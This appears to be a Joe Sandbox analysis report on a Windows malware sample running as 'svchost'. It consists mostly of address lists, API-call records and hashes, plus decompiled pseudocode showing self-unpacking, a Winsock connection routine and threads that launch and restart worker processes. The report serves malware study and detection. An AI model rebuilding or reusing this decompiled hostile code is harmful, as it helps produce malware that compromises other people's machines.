                                                                                                                                                                                                                                                                            0x0408c095
                                                                                                                                                                                                                                                                            0x0408c099
                                                                                                                                                                                                                                                                            0x0408c09a
                                                                                                                                                                                                                                                                            0x0408c09a
                                                                                                                                                                                                                                                                            0x0408c09c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408c09e
                                                                                                                                                                                                                                                                            0x0408c0a0
                                                                                                                                                                                                                                                                            0x0408c0b8
                                                                                                                                                                                                                                                                            0x0408c0bb
                                                                                                                                                                                                                                                                            0x0408c0bb
                                                                                                                                                                                                                                                                            0x0408c0a2
                                                                                                                                                                                                                                                                            0x0408c0a8
                                                                                                                                                                                                                                                                            0x0408c0af
                                                                                                                                                                                                                                                                            0x0408c0af
                                                                                                                                                                                                                                                                            0x0408c0c0
                                                                                                                                                                                                                                                                            0x0408c0c0
                                                                                                                                                                                                                                                                            0x0408c0c6
                                                                                                                                                                                                                                                                            0x0408c0c6
                                                                                                                                                                                                                                                                            0x0408c0cc
                                                                                                                                                                                                                                                                            0x0408c0d1
                                                                                                                                                                                                                                                                            0x0408c0d7
                                                                                                                                                                                                                                                                            0x0408c0d9
                                                                                                                                                                                                                                                                            0x0408c0d9
                                                                                                                                                                                                                                                                            0x0408c0df
                                                                                                                                                                                                                                                                            0x0408c0e2
                                                                                                                                                                                                                                                                            0x0408c0e2
                                                                                                                                                                                                                                                                            0x0408c0e2
                                                                                                                                                                                                                                                                            0x0408c0e6
                                                                                                                                                                                                                                                                            0x0408c0e7
                                                                                                                                                                                                                                                                            0x0408c0ec
                                                                                                                                                                                                                                                                            0x0408c0ef
                                                                                                                                                                                                                                                                            0x0408c0f0
                                                                                                                                                                                                                                                                            0x0408c0f4
                                                                                                                                                                                                                                                                            0x0408c0f4
                                                                                                                                                                                                                                                                            0x0408c0f6
                                                                                                                                                                                                                                                                            0x0408c0f6
                                                                                                                                                                                                                                                                            0x0408c0fa
                                                                                                                                                                                                                                                                            0x04001780
                                                                                                                                                                                                                                                                            0x04001781
                                                                                                                                                                                                                                                                            0x04001783
                                                                                                                                                                                                                                                                            0x04001789
                                                                                                                                                                                                                                                                            0x0400178f
                                                                                                                                                                                                                                                                            0x04001790
                                                                                                                                                                                                                                                                            0x04001795
                                                                                                                                                                                                                                                                            0x0400179a
                                                                                                                                                                                                                                                                            0x0400179c
                                                                                                                                                                                                                                                                            0x040019a0
                                                                                                                                                                                                                                                                            0x040019a2
                                                                                                                                                                                                                                                                            0x040019a2
                                                                                                                                                                                                                                                                            0x040017a2
                                                                                                                                                                                                                                                                            0x040017ac
                                                                                                                                                                                                                                                                            0x040017b6
                                                                                                                                                                                                                                                                            0x040017b6
                                                                                                                                                                                                                                                                            0x040017bb
                                                                                                                                                                                                                                                                            0x040017c1
                                                                                                                                                                                                                                                                            0x040017c8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040017ce
                                                                                                                                                                                                                                                                            0x040017d8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040017ec
                                                                                                                                                                                                                                                                            0x040017ff
                                                                                                                                                                                                                                                                            0x04001804
                                                                                                                                                                                                                                                                            0x04001807
                                                                                                                                                                                                                                                                            0x0400180d
                                                                                                                                                                                                                                                                            0x04001814
                                                                                                                                                                                                                                                                            0x04001822
                                                                                                                                                                                                                                                                            0x0400182c
                                                                                                                                                                                                                                                                            0x04001831
                                                                                                                                                                                                                                                                            0x04001834
                                                                                                                                                                                                                                                                            0x04001840
                                                                                                                                                                                                                                                                            0x04001859
                                                                                                                                                                                                                                                                            0x04001867
                                                                                                                                                                                                                                                                            0x04001870
                                                                                                                                                                                                                                                                            0x0400188b
                                                                                                                                                                                                                                                                            0x0400188b
                                                                                                                                                                                                                                                                            0x04001891
                                                                                                                                                                                                                                                                            0x040018ac
                                                                                                                                                                                                                                                                            0x040018ac
                                                                                                                                                                                                                                                                            0x040018b3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040018cd
                                                                                                                                                                                                                                                                            0x040018d2
                                                                                                                                                                                                                                                                            0x040018d5
                                                                                                                                                                                                                                                                            0x040018db
                                                                                                                                                                                                                                                                            0x040018e2
                                                                                                                                                                                                                                                                            0x040018f4
                                                                                                                                                                                                                                                                            0x040018fe
                                                                                                                                                                                                                                                                            0x04001903
                                                                                                                                                                                                                                                                            0x04001906
                                                                                                                                                                                                                                                                            0x04001912
                                                                                                                                                                                                                                                                            0x0400191e
                                                                                                                                                                                                                                                                            0x0400191e
                                                                                                                                                                                                                                                                            0x04001931
                                                                                                                                                                                                                                                                            0x0400193f
                                                                                                                                                                                                                                                                            0x04001948
                                                                                                                                                                                                                                                                            0x04001963
                                                                                                                                                                                                                                                                            0x04001963
                                                                                                                                                                                                                                                                            0x040018a3
                                                                                                                                                                                                                                                                            0x040018a3
                                                                                                                                                                                                                                                                            0x040018a6
                                                                                                                                                                                                                                                                            0x040018a6
                                                                                                                                                                                                                                                                            0x04001976
                                                                                                                                                                                                                                                                            0x04001981
                                                                                                                                                                                                                                                                            0x0400199b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400198b
                                                                                                                                                                                                                                                                            0x04001990
                                                                                                                                                                                                                                                                            0x04001996
                                                                                                                                                                                                                                                                            0x040017b6
                                                                                                                                                                                                                                                                            0x0408bf97
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bf97
                                                                                                                                                                                                                                                                            0x0408bf5b
                                                                                                                                                                                                                                                                            0x0408bf5d
                                                                                                                                                                                                                                                                            0x0408bf60
                                                                                                                                                                                                                                                                            0x0408bf62
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bf64
                                                                                                                                                                                                                                                                            0x0408bf64
                                                                                                                                                                                                                                                                            0x0408bf65
                                                                                                                                                                                                                                                                            0x0408bf67
                                                                                                                                                                                                                                                                            0x0408bf69
                                                                                                                                                                                                                                                                            0x0408bf6b
                                                                                                                                                                                                                                                                            0x0408bf6e
                                                                                                                                                                                                                                                                            0x0408bf6e
                                                                                                                                                                                                                                                                            0x0408bf70
                                                                                                                                                                                                                                                                            0x0408bf48
                                                                                                                                                                                                                                                                            0x0408bf4a
                                                                                                                                                                                                                                                                            0x0408bf4c
                                                                                                                                                                                                                                                                            0x0408bf4e
                                                                                                                                                                                                                                                                            0x0408bf51
                                                                                                                                                                                                                                                                            0x0408bf51
                                                                                                                                                                                                                                                                            0x0408bf53
                                                                                                                                                                                                                                                                            0x0408bf55
                                                                                                                                                                                                                                                                            0x0408bf55
                                                                                                                                                                                                                                                                            0x0408bf57
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bf57
                                                                                                                                                                                                                                                                            0x0408bf36
                                                                                                                                                                                                                                                                            0x0408bf36
                                                                                                                                                                                                                                                                            0x0408bf36
                                                                                                                                                                                                                                                                            0x0408bf36
                                                                                                                                                                                                                                                                            0x0408bf41

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 0408C05A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,04089FF9), ref: 0408C078
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(?,04089FF9), ref: 0408C089
                                                                                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(04000000,00001000,00000004,?,00000000), ref: 0408C0D7
                                                                                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(04000000,00001000), ref: 0408C0EC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1996367037-0
                                                                                                                                                                                                                                                                            • Opcode ID: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                                            • Instruction ID: 20fcce43128c80cbc216fde34acc2cdd335751d52faa48733a5718032d389bea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA51F6716542525BE720AEB8CEC0664B7F0EB02264718073DE5E5EB3C3EBA0B8059F61
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                                                            			E04001780() {
                                                                                                                                                                                                                                                                            				char _v404;
                                                                                                                                                                                                                                                                            				signed int _v408;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                                                                                                                                                                            				intOrPtr _v416;
                                                                                                                                                                                                                                                                            				intOrPtr _v420;
                                                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v428;
                                                                                                                                                                                                                                                                            				intOrPtr _v432;
                                                                                                                                                                                                                                                                            				void* _v436;
                                                                                                                                                                                                                                                                            				void* _v440;
                                                                                                                                                                                                                                                                            				void* _v444;
                                                                                                                                                                                                                                                                            				char* _t51;
                                                                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t51 =  &_v404;
                                                                                                                                                                                                                                                                            				_push(_t51);
                                                                                                                                                                                                                                                                            				_push(0x202); // executed
                                                                                                                                                                                                                                                                            				L0400100C(); // executed
                                                                                                                                                                                                                                                                            				if(_t51 != 0) {
                                                                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                                                                            					ExitProcess(0);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v408 = 0;
                                                                                                                                                                                                                                                                            				_v412 = 0;
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					_t52 = E04001490(); // executed
                                                                                                                                                                                                                                                                            					_v416 = _t52;
                                                                                                                                                                                                                                                                            					if(_v416 > 0 && _v416 < 0x2710) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					Sleep(0x7530);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            				_t54 = E040023E0( *((intOrPtr*)(0x4088c1c + _v408 * 4))); // executed
                                                                                                                                                                                                                                                                            				_t91 = _t90 + 4;
                                                                                                                                                                                                                                                                            				_v420 = _t54;
                                                                                                                                                                                                                                                                            				if(_v420 != 0) {
                                                                                                                                                                                                                                                                            					E04001DC0(_v420, 0x4085600); // executed
                                                                                                                                                                                                                                                                            					_t68 = E04001470(0xc);
                                                                                                                                                                                                                                                                            					_t91 = _t91 + 0xc;
                                                                                                                                                                                                                                                                            					_v440 = _t68;
                                                                                                                                                                                                                                                                            					_v424 = _v440;
                                                                                                                                                                                                                                                                            					 *_v424 =  *(0x4088c1c + _v408 * 4);
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v424 + 4)) = _v420;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_v424 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                            					CreateThread(0, 0, E04001630, _v424, 0, 0); // executed
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v428 = 0;
                                                                                                                                                                                                                                                                            				while(_v428 < 3) {
                                                                                                                                                                                                                                                                            					_t57 = E040023E0( *((intOrPtr*)(0x4088c20 + (_v412 + _v428) * 4))); // executed
                                                                                                                                                                                                                                                                            					_t91 = _t91 + 4;
                                                                                                                                                                                                                                                                            					_v432 = _t57;
                                                                                                                                                                                                                                                                            					if(_v432 != 0) {
                                                                                                                                                                                                                                                                            						E04001DC0(_v432, 0x4085600); // executed
                                                                                                                                                                                                                                                                            						_t62 = E04001470(0xc);
                                                                                                                                                                                                                                                                            						_t91 = _t91 + 0xc;
                                                                                                                                                                                                                                                                            						_v444 = _t62;
                                                                                                                                                                                                                                                                            						_v436 = _v444;
                                                                                                                                                                                                                                                                            						 *_v436 =  *(0x4088c20 + (_v412 + _v428) * 4);
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_v436 + 4)) = _v432;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_v436 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                            						CreateThread(0, 0, E04001630, _v436, 0, 0); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v428 =  &(_v428->nLength);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                                            				Sleep(0x9c40);
                                                                                                                                                                                                                                                                            				L04001006();
                                                                                                                                                                                                                                                                            				goto L16;
                                                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                                                            0x04001789
                                                                                                                                                                                                                                                                            0x0400178f
                                                                                                                                                                                                                                                                            0x04001790
                                                                                                                                                                                                                                                                            0x04001795
                                                                                                                                                                                                                                                                            0x0400179c
                                                                                                                                                                                                                                                                            0x040019a0
                                                                                                                                                                                                                                                                            0x040019a2
                                                                                                                                                                                                                                                                            0x040019a2
                                                                                                                                                                                                                                                                            0x040017a2
                                                                                                                                                                                                                                                                            0x040017ac
                                                                                                                                                                                                                                                                            0x040017b6
                                                                                                                                                                                                                                                                            0x040017b6
                                                                                                                                                                                                                                                                            0x040017bb
                                                                                                                                                                                                                                                                            0x040017c8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001990
                                                                                                                                                                                                                                                                            0x04001996
                                                                                                                                                                                                                                                                            0x040017ec
                                                                                                                                                                                                                                                                            0x040017ff
                                                                                                                                                                                                                                                                            0x04001804
                                                                                                                                                                                                                                                                            0x04001807
                                                                                                                                                                                                                                                                            0x04001814
                                                                                                                                                                                                                                                                            0x04001822
                                                                                                                                                                                                                                                                            0x0400182c
                                                                                                                                                                                                                                                                            0x04001831
                                                                                                                                                                                                                                                                            0x04001834
                                                                                                                                                                                                                                                                            0x04001840
                                                                                                                                                                                                                                                                            0x04001859
                                                                                                                                                                                                                                                                            0x04001867
                                                                                                                                                                                                                                                                            0x04001870
                                                                                                                                                                                                                                                                            0x0400188b
                                                                                                                                                                                                                                                                            0x0400188b
                                                                                                                                                                                                                                                                            0x04001891
                                                                                                                                                                                                                                                                            0x040018ac
                                                                                                                                                                                                                                                                            0x040018cd
                                                                                                                                                                                                                                                                            0x040018d2
                                                                                                                                                                                                                                                                            0x040018d5
                                                                                                                                                                                                                                                                            0x040018e2
                                                                                                                                                                                                                                                                            0x040018f4
                                                                                                                                                                                                                                                                            0x040018fe
                                                                                                                                                                                                                                                                            0x04001903
                                                                                                                                                                                                                                                                            0x04001906
                                                                                                                                                                                                                                                                            0x04001912
                                                                                                                                                                                                                                                                            0x04001931
                                                                                                                                                                                                                                                                            0x0400193f
                                                                                                                                                                                                                                                                            0x04001948
                                                                                                                                                                                                                                                                            0x04001963
                                                                                                                                                                                                                                                                            0x04001963
                                                                                                                                                                                                                                                                            0x040018a6
                                                                                                                                                                                                                                                                            0x040018a6
                                                                                                                                                                                                                                                                            0x04001976
                                                                                                                                                                                                                                                                            0x04001981
                                                                                                                                                                                                                                                                            0x0400199b
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 04001795
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                                              • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                              • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                              • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Create$SleepThread$CountEventExitObjectProcessSingleStartupTickWaitclosesocketlstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1305884959-0
                                                                                                                                                                                                                                                                            • Opcode ID: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                                            • Instruction ID: 2f7e3e578d268ca83db2a9f917eba75e9ec579b5eb93670916da3db20cf0bcb8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14512674A01224AFFB60EF60DC59BDAB7B0AB49708F0480E8E5497B2C0D7756E84CF52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 93 4001630-400163a 94 4001640-4001662 CoInitialize 93->94 95 400176c-4001771 93->95 96 4001766 94->96 97 4001668 94->97 96->95 98 400166f-4001676 97->98 98->96 99 400167c-400168d WaitForSingleObject 98->99 100 40016a3-40016bd GetExitCodeProcess 99->100 101 400168f-400169e TerminateProcess 99->101 102 4001761 100->102 103 40016c3-40016ca 100->103 101->96 102->98 104 40016dc-40016e3 103->104 105 40016cc-40016d7 Sleep 103->105 106 40016e5-40016f2 SetEvent 104->106 107 40016f6-4001733 CloseHandle Sleep call 40023e0 104->107 105->102 106->96 110 4001735 107->110 111 4001739-4001749 107->111 110->96 111->102 112 400174b-400175e call 4001dc0 111->112 112->102
                                                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                                                            			E04001630(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *0x4003090(0); // executed
                                                                                                                                                                                                                                                                            				_v12 = 0x3e8;
                                                                                                                                                                                                                                                                            				_v16 = 0x1388;
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if( *_v8 == 0) {
                                                                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                                                                            					 *0x4003094();
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                                                            				while(_v20 <= 0x3e8) {
                                                                                                                                                                                                                                                                            					if(WaitForSingleObject( *0x4088c2c, 1) != 0) {
                                                                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                                                                            						_t40 = GetExitCodeProcess( *(_v8 + 4),  &_v24); // executed
                                                                                                                                                                                                                                                                            						if(_t40 == 0) {
                                                                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                            							if(_v24 != 0x17d4a580) {
                                                                                                                                                                                                                                                                            								CloseHandle( *(_v8 + 4));
                                                                                                                                                                                                                                                                            								 *(_v8 + 4) = 0;
                                                                                                                                                                                                                                                                            								Sleep(0xbb8);
                                                                                                                                                                                                                                                                            								_t44 = E040023E0( *_v8);
                                                                                                                                                                                                                                                                            								_t67 = _t67 + 4;
                                                                                                                                                                                                                                                                            								 *(_v8 + 4) = _t44;
                                                                                                                                                                                                                                                                            								if( *(_v8 + 4) != 0) {
                                                                                                                                                                                                                                                                            									_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                            									if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                                                                                                                                                                                                                            										E04001DC0( *(_v8 + 4),  *((intOrPtr*)(_v8 + 8)));
                                                                                                                                                                                                                                                                            										_t67 = _t67 + 8;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L15;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							SetEvent( *0x4088c2c);
                                                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					TerminateProcess( *(_v8 + 4), 0);
                                                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L16;
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x0400163a
                                                                                                                                                                                                                                                                            0x0400176c
                                                                                                                                                                                                                                                                            0x04001771
                                                                                                                                                                                                                                                                            0x04001771
                                                                                                                                                                                                                                                                            0x04001642
                                                                                                                                                                                                                                                                            0x04001648
                                                                                                                                                                                                                                                                            0x0400164f
                                                                                                                                                                                                                                                                            0x04001659
                                                                                                                                                                                                                                                                            0x04001662
                                                                                                                                                                                                                                                                            0x04001766
                                                                                                                                                                                                                                                                            0x04001766
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001766
                                                                                                                                                                                                                                                                            0x04001668
                                                                                                                                                                                                                                                                            0x0400166f
                                                                                                                                                                                                                                                                            0x0400168d
                                                                                                                                                                                                                                                                            0x040016a3
                                                                                                                                                                                                                                                                            0x040016b5
                                                                                                                                                                                                                                                                            0x040016bd
                                                                                                                                                                                                                                                                            0x04001761
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001761
                                                                                                                                                                                                                                                                            0x040016ca
                                                                                                                                                                                                                                                                            0x040016e3
                                                                                                                                                                                                                                                                            0x040016fd
                                                                                                                                                                                                                                                                            0x04001706
                                                                                                                                                                                                                                                                            0x04001712
                                                                                                                                                                                                                                                                            0x0400171e
                                                                                                                                                                                                                                                                            0x04001723
                                                                                                                                                                                                                                                                            0x04001729
                                                                                                                                                                                                                                                                            0x04001733
                                                                                                                                                                                                                                                                            0x0400173f
                                                                                                                                                                                                                                                                            0x04001749
                                                                                                                                                                                                                                                                            0x04001759
                                                                                                                                                                                                                                                                            0x0400175e
                                                                                                                                                                                                                                                                            0x0400175e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001749
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001735
                                                                                                                                                                                                                                                                            0x040016ec
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040016ec
                                                                                                                                                                                                                                                                            0x040016d1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040016d1
                                                                                                                                                                                                                                                                            0x04001698
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001698
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 04001642
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000001), ref: 04001685
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 04001698
                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE(?,00000000), ref: 040016B5
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 040016D1
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 040016EC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 040016FD
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 04001712
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ProcessSleep$CloseCodeEventExitHandleInitializeObjectSingleTerminateWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 110750051-0
                                                                                                                                                                                                                                                                            • Opcode ID: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                                            • Instruction ID: d411829a3222fa01dcd82fa6bcec4b197f6087181c8baad7daf63abf5d028934
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9312A74A01204DFEB14DFA4DA98B9DB7B5FB44304F54C598E809BB280D779AE80DB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 115 4001160-4001178 socket 116 4001182-40011a9 htons gethostbyname 115->116 117 400117a-400117d 115->117 119 40011ba-40011bd 116->119 120 40011ab-40011d4 116->120 118 4001259-400125c 117->118 119->118 122 40011df-40011e5 120->122 123 4001202-4001208 122->123 124 40011e7-40011f8 connect 122->124 127 4001218-400121c 123->127 128 400120a-4001216 closesocket 123->128 125 4001200 124->125 126 40011fa-40011fe 124->126 125->122 126->123 130 4001256 127->130 131 400121e-4001251 setsockopt * 2 127->131 128->118 130->118 131->130
                                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                                            			E04001160(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                            				signed char _v8;
                                                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                                                            				signed char _v13;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				short _v34;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				char _v44;
